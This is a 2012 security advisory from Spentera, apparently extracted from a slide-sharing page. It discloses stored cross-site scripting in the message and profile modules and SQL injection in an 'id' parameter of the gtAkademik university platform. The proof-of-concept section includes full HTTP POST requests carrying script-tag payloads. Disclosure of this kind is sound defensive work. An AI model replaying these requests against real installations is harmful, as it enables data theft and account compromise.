Upload
niceboy797
View
219
Download
0
Embed Size (px)
Citation preview
7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 1/6
Copyright©2012.Spentera.Allrightsreserved. Page1
http://www.spentera.com Version1.3
Spentera–SecurityAdvisory–SPN-01-2012
gtAkademikGamatechnoSQLInjectionandPersistentCross
SiteScriptingVulnerability
February20,2012
7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 2/6
Copyright©2012.Spentera.Allrightsreserved. Page2
http://www.spentera.com Version1.3
gtAkademikGamatechno–SQLInjectionandPersistentCross-siteScripting–
SecurityAdvisory–SPN-01-2012
ReleaseDate Monday,February20,2012
LastUpdate Tuesday,June19,2012
VendorNotificationDate Friday,February10,2012
Product gtAkademikGamatechnoPlatform PHP
AffectedVersions Latestrelease(2011)
Testedon:Ubuntu11.10,Apache2.2.11,PHP5.3.9
RiskFactor
Impact Lossofintegrityandconfidentialityonserverandclientside.
AttackVector Attackercanretrievedatafromtargetdatabaseandplanclient
sideattackusingXSSbyeditexistinguserprofileandinject
javascriptXSSshell.
SolutionStatus Unpatched
SoftwareDescription
GtAkademikAcademicaisaweb-basedapplicationfocusesonacademicandadministrativedata
managementforuniversitystudents,managingtheactivitiesofKRS,student'sgrading
management,curriculummanagement&semester,untilDIKTIreporting.GtAkademikalsohas
featuressuchas;AutomationReportingSystemForEPSBEDDIKTI,SupportsCurriculum
High
7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 3/6
Copyright©2012.Spentera.Allrightsreserved. Page3
http://www.spentera.com Version1.3
Changes,EaseofmanagementofStudentTranscript,VirtualClass(eLearning),KRSandOnline
Coaching,andReporting.
VulnerabilityDetails
PersistentXSS
TheApplicationallowsanattackertoinjecttheXSSscriptinsidethedatabase(stored),because
thereisnosuchsanitationsprocess.TherearetwomodulessufferwithXSS:MessageModuleandUpdateProfileModule.
SQLInjection
The Application also suffers to SQL injection vulnerability, also because there is no such
sensitization process, this allowan attacker to extract contentsofdatabase, and find a lot of
importantdata,forexamplecredentialsthatstoredinsidethedatabase.
ProofofConcept
PersistentXSSinMessageModule
MessagemoduleisamoduleforinternalmessaginginsidethegtAkademik,wecansendanXSS
craftedmessagetoothersforexamplewecansendittoadministratoruser.
POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 4/6
Copyright©2012.Spentera.Allrightsreserved. Page4
http://www.spentera.com Version1.3
Referer:
http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg
==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMess
ageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E&act=doCompose&compBt
n=Kirim
PersistentXSSinUserProfileModule(savetheuserprofile)
It’samoduleusedwhenwewanttoupdatetheprofile,wecaninjectanXSSintotheprofileand
thensaveitintothedatabase,soeveryonewhotrytoviewourprofile,canbeattackedusingthe
XSS.
POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer:
http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo
3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/T
nKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencodedContent-Length: 213
tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%
29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp
7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 5/6
Copyright©2012.Spentera.Allrightsreserved. Page5
http://www.spentera.com Version1.3
_ortu=&simpan=Simpan SQLInjectionin‘id’parameter.
Theparameter‘id’isvulnerabletoSQLInjection.
http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204[INJEC
TEDPARAMETER]
Solution
Unpatched
Discoveredby
MadaR.PerdhanaandHannyHaliwelafromSpenteraResearch.
7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 6/6
Copyright©2012.Spentera.Allrightsreserved. Page6
http://www.spentera.com Version1.3
AboutUs
Spenteraisalimitedliabilitysecurityconsultingcompanythatfocusesonpenetrationtestingservices,vulnerabilitydiscovery,anddigitalforensics.Wehavebeenprovidingsatisfactory
servicetoclientsinIndonesiainparticular,andtheworldatlarge.Ourportfoliobecomeaproof
thatwearebuildingthiscompanyseriouslyandpayattentiontoeveryqualitythatisgiventotheclient.Allservicesweprovidearebasedoninternationalstandardsandareusedasprimary
standardsinsomecountriesliketheUnitedStates,Japan,Germany,France,andUnitedKingdom.
Someoftheclientsthatwehandleincludemilitary,police,government,mining,oilandgas,and
theprivatesectorsuchasfinance,andbanking.
Oursecurityexpertsexperiencefor7yearshasnodoubt.Ourgoodrelationshipwiththeclientis
themostimportantbasisforqualityofservicethatwecontinuetoimprove.
SpenteraCenterflixBoutiqueOffice
Jl.DanauTobano.104,BendunganHilir.
JakartaPusat.10210.
Jakarta.Indonesia.
T:+62(21)5701505F:+62(21)5738105
W:http://www.spentera.comE:[email protected]